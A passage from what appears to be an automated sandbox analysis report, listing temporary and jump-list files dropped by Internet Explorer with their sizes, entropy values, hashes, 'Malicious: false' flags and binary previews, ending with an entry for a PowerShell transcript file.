Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF17FF7A00290E7CB0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39753
Entropy (8bit):	0.5928829577778783
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+tzxQTlpSEj+FtCpSEj+FtOpSEj+Ftv:kBqoxKAuqR+tzxQTlpF+qpF+WpF+X
MD5:	1311F798B9D7E48F89C60EFF967D0634
SHA1:	B8D1EAA8579DF8EEB4E9F18F4F21918073349429
SHA-256:	F3C58E5FB445EBD3D697EBD19B2DE932EE9CB93BC87B9B82219A469C87EC328A
SHA-512:	922540A37A19A6AE94911D8066C15EF34947C5F4010CFC13D39BA751B4C9FD9A4D9B008B108057E4DBB2AF959ED12EF3B74B578AAD6EEFD7EA41021D49C5815B
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF1964B60154157683.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5708849053205508
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+blbLbpbYb7bZBYgvBYgrBYgw:kBqoxKAuqR+B/NMPdGgvGgrGgw
MD5:	30574B98F68F7D3F5065BBE203F70A42
SHA1:	7FAF459F6FCE5AEBA3032ACAB5DBCF08EE36FD51
SHA-256:	8686D439131266F0ADBC7CAEE7669E997B8AFCD862EB8AC21E527B93D1547FFB
SHA-512:	1EAFF28A4207C3D11F5CFAA777D52482A378BC0B7D14D437B03918C46BD92B7F0F11C2F10A618B8B6F424FD0CE9EB9C648798CC4B2A7BE27ECB10B3ED20B61B5
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF2046228F72B022AB.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39705
Entropy (8bit):	0.5831153823396821
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+FrJ4bFhDRUQ9ZtKhDRUQ9Zt+hDRUQ9ZtP:kBqoxKAuqR+FrJ4bFYQTIYQTcYQT1
MD5:	420F0FE6F4CE067037F402849782E4DE
SHA1:	53BCCD45C5FEFAA4EC9020E7DDB867F46AAF757B
SHA-256:	34451B0E2870F6873EA747906C3EAAB2D7EDCC9C6F49B495AC10B93B2A96E2DC
SHA-512:	5BDB3D343C46BAC4D189019F9F385849E196427FC5BEFBAE9A2D0AF46BACC67E1E6AA81450E03B70660CD100B8D6857C9A0505373C2112962C19B3ABDBF2B89D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF28ED687165C3ECDC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39681
Entropy (8bit):	0.5777828213242862
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+sKQx6scmy8dRcmy8dVcmy8d6:kBqoxKAuqR+sKQx6sXDI
MD5:	D4FD5A5B975A8F49A7B46467C5B0D917
SHA1:	C88CFEB74EDCE0EA68594847C8C0DC5555522841
SHA-256:	2C15C51B90FD4783F39D1D1C18CC1FB7D00B83158299EAFEDCBCFDCAAD9BBAB2
SHA-512:	166271BB064128BE3E21761E19182A896D1FF9890DBD114174D0DF05F3A6A26FD9FC9198B9387636F64A1373EF000437D66F606F52DC778F8C2426E70A81F63E
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3CEE3F7298EEA5CF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	42993
Entropy (8bit):	0.7815317186860645
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+w2st24qrHhU3VrHhUtEi9XrDnperHhU:kBqoxKAuqR+w2st24qDhGVDh4npeDh
MD5:	933D627F2567936D8183241170DCCAB5
SHA1:	18C45ED28D966ED3DB9532E95EF110ABC6175C16
SHA-256:	6D76337169DE95CE181D7D07DDD3A641A8BFE2DE9EC4CDB6C1CC2A018B44D3EA
SHA-512:	F91ABACD07DE88C05C4E2DB4038C3310DD79A36B37771BA9A70583A162D1B35BBC1F57FB6257338BB0A1D98923230236145B98F4DBDC29EFB093E76C96269182
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF56CBD744A2ED80D4.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39641
Entropy (8bit):	0.5705720844436606
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+qMWfMu9cYCn9cYCH9cYCM:kBqoxKAuqR+qMWfMu9cr9cT9cY
MD5:	567710F64606EF3E8BEB7ADB4A6A8337
SHA1:	796593D59996DC28137517AD74BA1DABC0320E21
SHA-256:	F1853871E87C05F34079431E3CEC0D69033F88A248559F0713C08BAEA7467258
SHA-512:	A7C93FBD5EF6A12D1CF7B4CBD95A9F2082A69A9399EC27996AEC081C64EA2830378716AE4A707CBD45487CDDD9ACF865B3EEFF4CE7C546E95D3F0BF2933316E3
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF61D152272FEF9AA9.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39641
Entropy (8bit):	0.5693834568689761
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+LFX+FrfLl+JFCfLl+JFmfLl+JF3:kBqoxKAuqR+LFX+FrDl+JgDl+JEDl+Jd
MD5:	E8238EFF8AE1200F9088165ABF992619
SHA1:	BD03F99B6FA18E7DE9B523F91232CE9A10E3B2FB
SHA-256:	F5FF68ABFADCCEF53B9B1664756164E9E72A5F394060DEA44CA00D2519906097
SHA-512:	C3E61BA9297843D7412130B691188AB7534EB658370CD0452E64A522418EF622C62C5839A458DBBA5BE27E6F03895BE3EBB817D41F7744A72CCB7E3039522F1A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6B1210F6FB25EB50.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39729
Entropy (8bit):	0.5892659470162525
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+pSp0pep3pEpKjQjymjQjymjQjyf:kBqoxKAuqR+0SYpycPmPmPf
MD5:	A8419C922BA25B091DE7AD4377093A77
SHA1:	AA2F92641FF3F2C84BE9B794A0277CC83768F9E6
SHA-256:	BA97EAE558B45E87E86E27A679B8AED12411E42725482D45A2A9ACF82ADCD034
SHA-512:	14B924459AE98224487F03CCD265E087AB31532E9F553F2DCF454B23BD58EA8B9A8201F96B16A4A108476E73AB47BB833288DDF17A6FCD2511157F7D83705811
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6D9A35ACD7FC2EA1.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	0.5686601017460816
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+uoCLYubHZmqG9bHZmqGJbHZmqGO:kBqoxKAuqR+uoCLYujZy9jZyJjZyO
MD5:	2F77DB70DC717FE98E8B913D5A36FBA3
SHA1:	27117FC0DD252A481BED0ADDF20601A02151DC77
SHA-256:	9A59F8B2F6E0E0129361963877EAEA3E72B8F841DCF0940380A5CDE41E880DFC
SHA-512:	EE47BECE161F068B97E531821FF361A91919305424128864EB9A904431246CE308AE7BA7A747CEF69D1F3107C752B3C97678036ED65FE1DB0FD220F82C5E62C9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7279FB1455334C84.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	22789
Entropy (8bit):	3.1249829180036697
Encrypted:	false
SSDEEP:	48:kBqoIE6jm8CliaFu1rWP9QWQgdVcnsXkOCCuGgOlUkiT0FCFKIV2FoRYTrcZ0PrW:kBqoIE6O4UYVqwdaDSYvW
MD5:	171CC62FE85014E0CF2BEA6F03C5E2C8
SHA1:	57912E1E64608290B170ED1624D5A0C7439E58A6
SHA-256:	75D83569DBCD1D3D02DF4E9619BF55D77B5ABA599177C33CDD54DD614FFF1405
SHA-512:	70EC1DA9829E52746B1AB9D502DC60D2AC0CAD85EB36ABE0014545D90D10346ED70492D615469FA742E68A90B75B50A864B271899EBC36C009FB481D2A0D62E0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7BD3DB6601AFD840.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39665
Entropy (8bit):	0.5783371188889828
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+gm89mg6b57fBu6b57fB+6b57fB3:kBqoxKAuqR+gm89mg65Bu65B+65B3
MD5:	27735C6A314B4C03D8DA8CDA7D7E4034
SHA1:	6D206C564989A1E0A57366CBEDF8CCAF965527AA
SHA-256:	46EF24365D3EF9922602711E64E8551DF7DC529AA846B423D72FD82B5E61F27E
SHA-512:	51C32355120F97B05D36D9C58CB0510AACFE340B72347EAB401FE95396200CF574F2E46BDF7281E76609D61ED6E49AE3952764ED2E4F5F45F8D710A8B4AD712D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7E35635C1AE8EED8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39665
Entropy (8bit):	0.5750490052310008
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+ouk1eoEN6LosEN6Lo8EN6Lod:kBqoxKAuqR+ouk1eoU6ksU6k8U6kd
MD5:	5720385D9ABF37459A2F3104CA724F38
SHA1:	98F89F4D408D62EB749CA4D3FC2885DA6195D67C
SHA-256:	243957555F07D08484CF524B28CD849090CCA553FC21599F67297B91602EC814
SHA-512:	967A60AD543359206209174AFB6C4AC2EFE810408C3FECD3631A000DDCCB9A7B667DCFF8B82D6DD6F1FA5E6EB57A992776878D7DD8B40DCAC4477DDC4C8046BB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF838163A8F73BC8DE.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39665
Entropy (8bit):	0.5756353345581126
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+a8mv8yScDz0aScDz06ScDz0j:kBqoxKAuqR+a8mv8yScEaScE6ScEj
MD5:	5C912C0A94689F5C1183E40DF67DB11F
SHA1:	CAB1751C99E1E1D1FBB4A2A6E55737971675C043
SHA-256:	0CFF9814183C24716ADBA2FFEF6811D3C579A6DE5E7AEAC6FC0395AB650ED109
SHA-512:	5675AC239DA1C9B042F7910C21F9912B3512FC7C7197AEB4DD6C750E575AE161A00BC7662992904C8796200DA35635DF3462753F7BCCA764FB885A89DF0BB5FF
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF84F8A385349A5192.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39665
Entropy (8bit):	0.575445659543973
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+CkuH0aui9RTwui9RTAui9RTx:kBqoxKAuqR+CkuH0aD7TwD7TAD7Tx
MD5:	0C519938CB8F338E1D97EDF9B6CB7E96
SHA1:	19A20F852DDB5B5DE43E2913F0D772CC0CCA466F
SHA-256:	E913D633D3C6E7B15AFE36F429E184BC88733D6E8CAEF879A40B53DB353D5728
SHA-512:	A5F037807A8917EF9F571EC26F974059EA7A38F13354E587D582FD45BFAB759F6901EAF4E8C058888E15DB82A544C1D8C005E0B5C1E05B3B017B6012C8740E6C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF92DC50A790C3DAC6.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5723352558913694
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+2OJqD/I/WZQKM4KnNzZQKM4KnN/ZQKM4KnNE:kBqoxKAuvScS+2OJqDw+JxozJxo/JxoE
MD5:	C600E2DF5DB4BE0317810F8C423C1393
SHA1:	223EFEFE174F7E0F81766A9261E63DEE1F502FA4
SHA-256:	89C825117FC80476C223349540ACC7E70E5C8A16C3B66D549749E6FDFBFA5106
SHA-512:	9D497F3A49F445676743867CE2D8E8F8BD14B3FE33586644BBDC865E61CAE67A74F7FC50E7860A700D5E3AF7E52B044E7ABAFDB707DB4A4879B5E0A263D541FE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB29C480CFB21E55C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	25441
Entropy (8bit):	0.27918767598683664
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
MD5:	AB889A32AB9ACD33E816C2422337C69A
SHA1:	1190C6B34DED2D295827C2A88310D10A8B90B59B
SHA-256:	4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
SHA-512:	BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBC8D754ED219C9B7.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39609
Entropy (8bit):	0.5658553095565209
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+AGcdG8EECcN3EECcNHEECcNs:kBqoxKAuqR+AGcdG8/JN3/JNH/JNs
MD5:	7451D67B3D125FEE00DA5F2066605B1E
SHA1:	5F6E3E77F0E38C2BE519734355A3EE4C2D4A6B60
SHA-256:	35DEC710AB276EC0A5988B2305C01CD72057B5497BBBE4536DF37D2CF5BB5DDC
SHA-512:	C1EC7565E8D52D9473DD30AAFCE6F7D4E4517D0CD54FB8E4B65FA8F30CD1AE1ABA3F2FE98240EB23EC2D045ED0BC4CFE60A74DCF6907DA7FBDABD49EC1C1AFB9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBD2881426746317C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39689
Entropy (8bit):	0.579022595005753
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+xvdc/5CpaivsUgCpaivsUMCpaivsUl:kBqoxKAuqR+xvdc/5+aEI+aEU+aEt
MD5:	87262F90998B2349262B12C301AEF780
SHA1:	444061915FD3A0665D8EE3733EDA4404B6AB5592
SHA-256:	1723D0D61CE915C6C5278F91EA7A53D5AE65110D833AF02F21E96B6D07B9C169
SHA-512:	1B643E687023C81BE4DA21C760D7F9681719D0069D235AB48AE952CC1520649D91E58AE3688DB883F2BCE0B84729EE3A4A73E235FE93900CE97D774A21C88548
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD4B9E641DE8C42CA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39617
Entropy (8bit):	0.5691033876075831
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+qMWfM6tlleKTYtlleKTgtlleKTR:kBqoxKAuqR+qMWfM6NeKTYNeKTgNeKTR
MD5:	847979655BB391954BBA0894E12C7311
SHA1:	50128680C5473595D85D4BC32D6BF08F4FBA664A
SHA-256:	EA3DBF11288F2677269C7D99B32A6EF9232658BF85F299EC987AF9C02480F582
SHA-512:	C390CB42374791697F54762861D96C30765233EBD6492E2169AB4746297D0817A6410B7046BCEE6C81D717C215F153AD969FF2F3C0E8A296E76C7AA31B29C282
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE365BB078506338E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39641
Entropy (8bit):	0.5729224065179025
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+bVHuaIais5vJ4MC3Oos5vJ4MC3Ocs5vJ4MC3O1:kBqoxKAuvScS+bVHuVbq4/zq4/rq4/Q
MD5:	E2601400DC0B9AA584E32B538DAB94CC
SHA1:	D19EB2173DB512318F6C14E32ADCA89BA2A00452
SHA-256:	09307F9A92719D2767FC7C7449E2E0CA283850CEED92B50966BAA0C737A6EA91
SHA-512:	0E95E0638D5EE4D1E208F062BBB234F17BFC368D8150312875E5445FA23720DEA308BF60F3DF0B6852CC3179138219C8DE255C2CFE447C2D599AA34106D04FB6
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE4E4444FD2338AE2.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39641
Entropy (8bit):	0.570085727981072
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+u5m89BIBirNlB7LlqFzrNlB7LlqFrrNlB7LlqFQ:kBqoxKAuvScS+gm89msjJl+jJl6jJlL
MD5:	92B8A46B2456AE3DDA3A7774A49DB988
SHA1:	8FD08A93D0335919134334A39105FB7645DA19BA
SHA-256:	B9152C403A48E19120D24332AEC66FF133F6E70127F6E0671695927891C918AB
SHA-512:	9DE1BDE98E9E5E4B7D6819E4AD22ED68E52AE58D31BDD2DCCD91E8AFD5197E0590A71905B7B66AE31A467840F45B7AA25CB890FAB1F0DE6B0F45DE51DEE1A21A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF0D440F5853B1130.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	196540
Entropy (8bit):	3.131324000709719
Encrypted:	false
SSDEEP:	3072:lZ/2Bfcdmu5kgTzGtUZ/2Bfc+mu5kgTzGt:Mz
MD5:	9913975AF61D82823B9F2ED9409F21FF
SHA1:	7F523700FAF0FE2D6CB0846FE5036F10016EB189
SHA-256:	C3D3B2EADE438DF58EFAA5F01F817CFDE39B8FF4A286807CF6EFEBBFEB9D5682
SHA-512:	FC23A7728A8231D47EB46DDFEC7D7C9AF48B2F97BBAD3D953A206A1C7F279729A0C7256779B7AA7200D8A703F848F92A9D76C6717D18E71C3BEAA030FE7E5963
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF2C4491955476C5E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5734054464102231
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+ouk1ewpRtOcwCvpRtOcwCrpRtOcwCw:kBqoxKAuqR+ouk1ewpRMT+pRMTGpRMT/
MD5:	09E234E2AFDE721C5C4DDC6479717979
SHA1:	1864A6C956B244D0FF28B814443B8B7CA3F7AFA7
SHA-256:	D0CA005929E6288D6BFB20986AB9C6170C48F7F18FFFAD32F1D61E7ED09C9E20
SHA-512:	96E827080227784F936FA12BFB99C613E8C32991A20452FCCE7C82B9D3E1677CA269311502F8AEFA567D9543B1F82E3070B97B99D7833EBC6864354D697950BB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YL99YVZ9GL6A2ZCAXOT.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1799057857253823
Encrypted:	false
SSDEEP:	48:wdi3PAIhC9GrIoAAsASFHdi3PAIhh683GrIoAAczkdi3PAIhx9GrIoAAV1H:rPAr9SgAJVPAI3SgAIPA89SgAf
MD5:	180DC7A33785F0D8A4BBA6D7CA0EC244
SHA1:	5B2E0EA58D120458CF3997A58A4378CDA931FB24
SHA-256:	E11822FC3C8EBE36125DE0910A85E447E66B5BC5C9553CE38697770CABC07726
SHA-512:	B690785672BB973EF1ED683EA2D6C0E79B99D89E36F6B9EE9C0D38AA08473DB3E7D776EC7AC2A19672E6AFC7235ABDAA56B7BDD30B4A3500512236078F46CCD3
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.....g.br....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..R.c....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R.c..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.c.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........$Hh8.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTY8GN5NMI0GZW178LM0.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1818527642183336
Encrypted:	false
SSDEEP:	48:+di3PAIhC9GrIoAAsASFHdi3PAIhh683GrIoAAczkdi3PAIhx9GrIoAAV1H:ZPAr9SgAJVPAI3SgAIPA89SgAf
MD5:	B8CBF0D853D596FEE3394830E4662CB4
SHA1:	428EAD1B5CF83A0EE263BA20A3C8DCC17CC65BCD
SHA-256:	5C826F883752F55D5801223ADDBED8FCF56A2EDFF59C65496C207A90F62FD260
SHA-512:	82796BD94676E19108043513162D62257ADFB67FDDD301C6777D5A25223B0152249E935A701CBCFE386C4768F941C86A73120F22BCF642BEB5457105B4618A9F
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.....g.br....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.>Q.;....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R.c..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.c.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........$Hh8.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C3FG2SGRGMKZVCTKB6DL.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1799057857253823
Encrypted:	false
SSDEEP:	48:wdi3PAIhC9GrIoAAsASFHdi3PAIhh683GrIoAAczkdi3PAIhx9GrIoAAV1H:rPAr9SgAJVPAI3SgAIPA89SgAf
MD5:	180DC7A33785F0D8A4BBA6D7CA0EC244
SHA1:	5B2E0EA58D120458CF3997A58A4378CDA931FB24
SHA-256:	E11822FC3C8EBE36125DE0910A85E447E66B5BC5C9553CE38697770CABC07726
SHA-512:	B690785672BB973EF1ED683EA2D6C0E79B99D89E36F6B9EE9C0D38AA08473DB3E7D776EC7AC2A19672E6AFC7235ABDAA56B7BDD30B4A3500512236078F46CCD3
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.....g.br....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..R.c....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R.c..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R.c.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........$Hh8.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\Documents\20210706\PowerShell_transcript.783875.CfM6Qt+o.20210706143119.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	5.474924679179615
Encrypted:	false
